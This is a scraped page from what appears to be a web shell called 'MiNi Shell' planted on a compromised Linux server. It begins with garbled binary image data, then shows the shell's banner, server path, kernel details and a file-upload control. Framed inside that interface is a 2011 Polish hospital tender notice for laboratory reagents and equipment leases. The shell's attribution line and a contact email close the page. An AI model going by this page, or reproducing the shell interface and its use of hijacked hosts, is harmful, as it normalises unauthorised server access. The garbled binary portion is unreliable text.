JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111213/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111213/425100-N-2011.html

<p class="kh_header"><b>Nowa Dęba: DOSTAWA ODCZYNNIKÓW LABORATORYJNYCH ORAZ DZIERŻAWA APARATÓW dla Szpitala Powiatowego  w Nowej  Dębie</b><br>
<b>Numer ogłoszenia: 425100 - 2011; data zamieszczenia: 13.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Nowej Dębie , ul. M. Curie-Skłodowskiej 1a, 39-460 Nowa Dęba, woj. podkarpackie, tel. 015 84612651 w. 158.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoznowadeba.ires.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ODCZYNNIKÓW LABORATORYJNYCH ORAZ DZIERŻAWA APARATÓW dla Szpitala Powiatowego  w Nowej  Dębie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DOSTAWA ODCZYNNIKÓW LABORATORYJNYCH ORAZ DZIERŻAWA APARATÓW dla Szpitala Powiatowego  w Nowej  Dębie
Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 1do SIWZ -Formularz Asortymentowo - Cenowy oraz Załącznik nr 2 do SIWZ - Parametry techniczno-użytkowe aparatu do SIWZ
Zamawiający  dopuszcza składanie ofert częściowych.
PAKIET  Nr 1  -  Dostawa odczynników wraz z dzierżawą aparatu do badania krwi metodą immunochemiczną;
PAKIET  Nr 2  -  Dostawa odczynników wraz z dzierżawą aparatu do wykonywania badań równowagi Kwasowo-Zasadowej;                    
PAKIET  Nr 3  -   Dostawa odczynników wraz z dzierżawą aparatu do badań hematologicznych ;
PAKIET Nr 4   -  Dostawa odczynników wraz z dzierżawą czytnika do moczu ;
PAKIET Nr 5   -  Dostawa odczynników wraz z dzierżawą sprzętu do ich inkubacji i programem do oceny;
PAKIET Nr 6  -   Dostawa odczynników wraz z dzierżawą systemu automatycznego z funkcją określania 
PAKIET  Nr 7 -   Odczynniki i podłoża
PAKIET  Nr 8 -   Odczynniki do serologii grup krwi     
PAKIET  Nr 9 -   Odczynniki do serologii grup krwi     
PAKIET Nr 10 -  Odczynnik do badania do badania w kierunku kiły
PAKIET Nr 11  -  Odczynniki do serologii grup krwi   
PAKIET Nr 12 -  Odczynniki do koagulologii na aparat KSELMED 3002 OPTIC - ozn. Wykonywane met.mikro w dubletach     
PAKIET Nr 13 - Odczynniki do analityki ogólnej                                
PAKIET Nr 14 - Odczynniki  do analizatora hematologicznego SWELAB AC 900 i odczynnik  do rozmazów krwi                           
PAKIET Nr 15 - Odczynniki gotowe- Chemia kliniczna- aparat STAT-FAX 1904 
PAKIET Nr 16 - Testy latexsowe, kasetkowe i paskowe do met.jakościowych i półilościowych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.61.00-6, 33.69.62.00-7, 33.69.63.00-8, 38.43.40.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie wprowadza szczególowego warunku w tym zakresie.Ze względu na charakter przedmiotu zamówienia Zamawiajacy nie żąda od Wykonawców dodatkowych dokumentów, w celu wykazania, iż spełniają w/w warunek.Ocena spełnienia powyzszego warunku odbędzie się na podstawie oświadczenia, przedstawionego przez Wykonawcę wraz z ofertą - w/g wzoru na Załączniku nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw w zakresie  
     niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie  ostatnich trzech lat  przed upływem 
     terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  odpowiadających swoim 
     rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości,  przedmiotu, dat 
     wykonania i odbiorców, oraz  załączenie dokumentu potwierdzającego, że te  dostawy  zostały  wykonane  
     należycie lub są wykonywane należycie .
     Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże  że, zrealizował min 1 zamówienie na dostawę o charakterze 
     co do przedmiotu jak i wartości zamówienia  w zależności od wybranego pakietu.
                   Dokument ten będzie potwierdzeniem, że Wykonawca posiada doświadczenie w zakresie realizacji 
               dostaw będących przedmiotem zamówienia.
    Wykonawca zobowiązany jest do załączenia do oferty  dokumentów potwierdzających należyte 
    wykonanie zamówienia (referencje).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie wprowadza szczególowego warunku w tym zakresie.Ze względu na charakter przedmiotu zamówienia Zamawiajacy nie żąda od Wykonawców dodatkowych dokumentów, w celu wykazania, iż spełniają w/w warunek.Ocena spełnienia powyzszego warunku odbędzie się na podstawie oświadczenia, przedstawionego przez Wykonawcę wraz z ofertą - w/g wzoru na Załączniku nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie wprowadza szczególowego warunku w tym zakresie.Ze względu na charakter przedmiotu zamówienia Zamawiajacy nie żąda od Wykonawców dodatkowych dokumentów, w celu wykazania, iż spełniają w/w warunek.Ocena spełnienia powyzszego warunku odbędzie się na podstawie oświadczenia, przedstawionego przez Wykonawcę wraz z ofertą - w/g wzoru na Załączniku nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłacona polisa, a przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony 
               od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia,
               i  zobowiązuje się do utrzymania tego  ubezpieczenia przez  okres trwania umowy aktualna na dzień składania ofert, 
               wraz z dowodem - potwierdzeniem wpłaty przy sumie gwarancyjnej  nie mniejszej niż 20 000,00 zł .
               Dokumenty te będą potwierdzeniem sytuacji ekonomicznej  i finansowej Wykonawcy, zapewniającej 
               realizację dostaw zgodnych z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a)   Oświadczenie, iż oferowane wyroby posiadają odpowiednie dokumenty i są  one aktualne dla  przedmiotowego 
              postępowania, oraz mogą być stosowane w służbie  zdrowia zgodnie z Ustawą z dnia 20 maja 2010r. dla wyrobów 
              kwalifikowanych jako   wyroby  medyczne ( jeśli prawo nakłada obowiązek posiadania takich dokumentów),
                      Zamawiający zastrzega sobie prawo żądania okazania przez Wykonawcę dokumentów dopuszczających zaoferowany 
                      asortyment do obrotu i stosowania.

                b)  Wykonawca jest zobowiązany do załączenia materiałów potwierdzających zgodność zaoferowanych  
                  parametrów i konfiguracji przedmiotu zamówienia ( prospekty lub broszury lub wyciągi z instrukcji
                  lub foldery lub zdjęcia);</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)Postanowienia dotyczące wnoszenia  oferty wspólnej przez dwa lub więcej podmioty gospodarcze ( konsorcja / 
         spółki cywilne) :
1.	Wykonawcy mogą  wspólnie ubiegać się o udzielenie zamówienia.

2.	Jeżeli oferta wspólna złożona przez dwóch lub więcej wykonawców zostanie wyłoniona w prowadzonym postępowaniu jako najkorzystniejsza przed podpisaniem umowy w sprawie zamówienia publicznego, Zamawiający zażąda w wyznaczonym terminie złożenia umowy regulującej współpracę tych wykonawców, podpisanej przez wszystkich partnerów , przy czym  termin, na jaki została zawarta, nie może być  krótszy niż termin realizacji zamówienia.

3.	Wykonawcy ustanawiają  pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy, a pełnomocnictwo / upoważnienie do pełnienia takiej funkcji 
wystawione zgodnie z wymogami ustawowymi, podpisane przez prawnie upoważnionych przedstawicieli  każdego z wykonawców winno być dołączone do oferty. 

4.	Oferta winna zawierać wszystkie dokumenty, oświadczenia i informacje wymienione , w punktach :
1)   w pkt.VI. SIWZ ppkt. 1 - a)
        2)  w pkt.VI.SIWZ ppkt. 2  - a) b) 
                 dla każdego partnera z osobna, pozostałe składane  są wspólnie.
5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia  ponoszą solidarną odpowiedzialność za wykonanie umowy.
         Wykonawca udostępni Zamawiającemu w/w dokumenty na każde żądanie Zamawiającego.
       Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez  
       Zamawiającego  oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1, lub którzy nie złożyli 
       pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których 
       mowa w art. 25 ust. 1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w 
       wyznaczonym terminie, chyba, że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne 
       byłoby unieważnienie postępowania; 
       Złożone na wezwanie Zamawiającego oświadczenia lub dokumenty powinny potwierdzać spełnianie przez 
       Wykonawcę warunków SIWZ -  udziału w postępowaniu oraz spełnianie przez oferowane dostawy, wymagań 
       określonych przez Zamawiającego, nie później niż w dniu w którym upłynął termin składania ofert.
       Zamawiający może wezwać do złożenia wyjaśnień w wyznaczonym przez siebie terminie, dotyczących 
       oświadczeń lub dokumentów, o których mowa w art. 25 ust.1.
         b)  Wypełniony i podpisany  Załącznik nr 1 do SIWZ  - Formularz Asortymentowo-Cenowy ( w zależności od wybranego                                        
              pakietu ).
              Zamawiający dopuszcza zmianę formy załącznika nr 1 przez Wykonawcę lecz zastrzega,  że  musi zawierać  co 
              do treści wszystkie  dane podane we wzorze do SIWZ.
         c/) Wypełniony i podpisany Załącznik nr 2 do SIWZ - Parametry techniczno-użytkowe aparatu ( w zależności od wybranego 
              pakietu)
         d) Wypełniony i podpisany formularz Załącznik nr 3 do SIWZ - Formularz Ofertowy Wykonawcy ( w zależności 
              od  wybranego pakietu)
         e)  Wypełniony i podpisany Załącznik nr 4 do SIWZ  - Oświadczenie o spełnieniu warunków udziału w  
            postępowaniu
f)   Wypełniony i podpisany Załącznik nr 5 do SIWZ  - Oświadczenie Wykonawcy o braku podstaw do  wykluczenia.
         g)   Parafowany na każdej stronie  Wzór umowy - Załącznik nr 6 do SIWZ (w zależności od wybranego pakietu)
         h)   Pełnomocnictwo  osoby / osób podpisujących ofertę do podejmowania zobowiązań w imieniu Wykonawcy, o ile nie 
               wynikają  z przepisów prawa lub innych dokumentów;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający podpisze umowę z wykonawcą, który przedłoży najkorzystniejszą ofertę z punkt widzenia kryteriów 
  przyjętych w niniejszej specyfikacji.
           2. O miejscu i terminie podpisania umowy zamawiający powiadomi Wykonawcę pismem lub telefonicznie. 
           3. Umowa zawarta zostanie zgodnie ze  Wzorem umowy stanowiącym Załącznik nr 6 do SIWZ w zależności od wybranego 
               pakietu.
4. Wszelkie zmiany umowy wymagają formy pisemnego aneksu z zastrzeżeniem art. 144 ustawy prawo 
    zamówień publicznych. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy 
    w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, oraz określa warunki tych 
    zmian przez wprowadzenie do zawartej umowy następujących aneksów: 
  1)  Zamawiający dopuszcza zmianę stawki VAT obowiązującej na oferowane materiały pod warunkiem 
       zmiany stawek obowiązujących na terenie Polski potwierdzonych odpowiednią ustawą lub 
       rozporządzeniem Ministra Finansów. 
2) Zamawiający dopuszcza możliwość zmiany producenta dostarczanych materiałów na wniosek 
        wykonawcy pod warunkiem że oferowane materiały będą takiej samej lub lepszej jakości oraz w tej 
        samej cenie, a Wykonawca uzasadni konieczność dokonania takiej zmiany.
             3) Zamawiający dopuszcza zmianę umowy w drodze aneksu w zakresie:
          a) zmianę jakości, parametrów lub innych cech charakterystycznych dla przedmiotu zamówienia, w tym  
              zmianę numeru katalogowego produktu bądź nazwy własnej produktu;
 b)sposobu konfekcjonowania;
           c)wielkości opakowań;
           d)zmianę terminu realizacji dostaw;
          Warunkiem zmian wykazanych w pkt. a - d mogą być:
           - wprowadzony zostanie na rynek przez wykonawcę produkt zmodyfikowany bądź udoskonalony;
                   - wystąpi przejściowy brak produktu przy jednoczesnej możliwości dostarczenia produktu 
                 zamiennego o parametrach nie gorszych od produktu objętego Umową;
           - w wyniku zmiany Umowy możliwe będzie podniesienie poziomu / jakości badań wykonywanych    
              przez Zamawiającego;
        - będzie to konieczne ze względu na zapewnienie bezpieczeństwa lub zapobieżenie awarii.
        - wymagać tego będzie prawidłowa realizacja przez Zamawiającego zadań polegających na 
          wykonywaniu świadczeń diagnostycznych ;
        - zmiana w inny sposób dostarczy pożytku Zamawiającemu.
            Zmiany nie mogą skutkować zmianą ceny jednostkowej, zmianą wartości umowy i nie mogą być                     
            niekorzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoznowadeba.ires.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnwj 39-460 Nowa Dęba, ul.M.C.Skłodowskiej 1A;osob.pokój Nr 111;za zaliczeniem pocztowym przesyłając wniosek z adresem i nr NIP.Cena SIWZ 30,00 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.12.2011 godzina 10:00, miejsce: Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnwj 39-460 Nowa Dęba, ul.M.C.Skłodowskiej 1A - Sekretariat pokój Nr 104.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com